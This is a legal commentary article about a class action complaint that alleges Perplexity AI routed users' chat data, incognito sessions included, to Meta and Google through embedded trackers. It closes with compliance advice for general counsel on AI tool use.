Your AI Chat History Is Being Sold. A Class Action Just Made It Official.
A 135-page class action complaint landed in federal court in San Francisco on March 31, and it should make every general counsel rethink how their company uses AI chatbots. The lawsuit alleges that Perplexity AI embedded tracking tools from Meta and Google directly into its platform, sending users' chat data to both companies before Perplexity itself even processed it. No disclosure. No consent. Just a pipeline from your "private" AI conversation straight to the two largest advertising companies on earth.
The plaintiff, filing as John Doe, claims the tracking operated even when users activated Perplexity's "incognito mode," a feature the company markets as creating "anonymous threads" that "won't save to your history and expire after 24 hours." According to the complaint, that promise was hollow. Meta and Google's tracking tools allegedly harvested email addresses, Facebook IDs, IP addresses, device information, and the full text of user prompts and AI responses.
What Users Were Actually Sharing
The complaint catalogs the kinds of information people routinely share with AI chatbots: tax planning strategies, legal questions, financial advice, health concerns, political views. The plaintiff himself used Perplexity to calculate Social Security timing, plan Roth IRA conversions, and research cannabis investments. He believed those conversations were private.
That belief was reasonable. Perplexity designed its interface to feel like a conversation. The chat function mimics human interaction. The incognito mode implies privacy. Studies cited in the complaint confirm what anyone who's used these tools already knows: people share things with AI chatbots they wouldn't share with other humans, including relationship problems, health fears, and identity questions.
The disconnect between user expectations and reality is the core of this case. People treated Perplexity like a confidential advisor. The complaint says Perplexity treated their conversations like inventory.
The Legal Theory Is Familiar. The Context Is Not.
The 14 counts in the complaint draw from well-established privacy law. Invasion of privacy under the California constitution. Violations of the state's Comprehensive Computer Data Access and Fraud Act. Federal Electronic Communications Privacy Act claims. Deceit and unfair competition.
None of these are novel theories. California courts have seen waves of tracking-technology litigation over the past five years. What changes here is the context: AI chatbot conversations contain qualitatively different information than website browsing history or search queries. When someone asks an AI chatbot for legal advice about a custody dispute or runs financial scenarios through it, the data is more intimate than anything a tracking pixel on a news site would capture.
Google and Meta are both named as defendants. The theory is straightforward: they built the tracking tools, they received the data, they profited from it.
Perplexity's chief communications officer, Jesse Dwyer, told reporters the company had "not been served any lawsuit that matches this description" and could not "verify its existence or claims." The complaint is publicly filed in the Northern District of California.
Two Classes, One Gap
The plaintiff seeks certification of two classes. The first covers all U.S. users who chatted with Perplexity and had their data sent to Meta or Google between December 7, 2022, and February 4, 2026. The second is a California-only subclass with the same parameters.
Paid subscribers with "Pro" or "Max" plans are excluded. A footnote explains those accounts are "subject to different terms and conditions." The implication is worth noting: free users got tracked, paid users got different terms. If that distinction holds up, it creates a two-tier privacy model where the product you don't pay for isn't the software. It's your data.
Perplexity is not a small company. The complaint notes a $20 billion valuation as of September 2025 after raising $200 million in funding. It operates from San Francisco, neighboring OpenAI and Anthropic. The scale of the potential class (every free Perplexity user over a three-year period) is enormous.
What This Means for Companies Using AI Tools
If your company has employees using AI chatbots for work (and they do, whether you've authorized it or not), this case raises immediate questions.
First, review your AI acceptable use policy. If employees are entering client data, deal terms, strategy documents, or legal questions into AI chatbots, that information may be going places your privacy policy promises it won't. The Perplexity complaint alleges the tracking happened at the code level, invisible to users. Your employees would have no way to know.
Second, audit your vendor agreements. If you're paying for enterprise AI tools, check whether the terms of service address third-party tracking and data sharing. The distinction between free and paid tiers in this case suggests that paid accounts may have different (possibly better) protections. "May" is doing heavy lifting in that sentence. Confirm it.
Third, update your data handling risk assessment. AI chatbots are a new category of data exfiltration risk. They don't look like a data breach because users voluntarily enter the information. But if that information is routed to third parties without consent, the legal exposure is the same.
What to Do Now
The Ahmad, Zavitsanos & Mensing firm out of Houston, a 60-lawyer litigation shop, is running point for the plaintiff. They describe themselves as "first and foremost a trial firm." That framing is intentional. This isn't a settlement mill filing nuisance suits. They're building for trial.
For general counsel and compliance officers, the action items are concrete:
Inventory which AI tools your organization uses. Map the data flows. Determine whether any third-party tracking operates within those tools. If you can't answer that question, neither could Perplexity's users, and that's the problem.
The broader signal is clear. The AI industry spent three years telling users their conversations were private while building business models that depended on those conversations being anything but. This lawsuit is the first major test of whether courts will enforce the promises AI companies made, or whether "incognito mode" was just a marketing feature with no legal weight.
Don Ho, Esq. is Co-Founder & CEO of Kaizen AI Lab, advising companies on operational growth strategies and the legal aspects of AI integration in their businesses.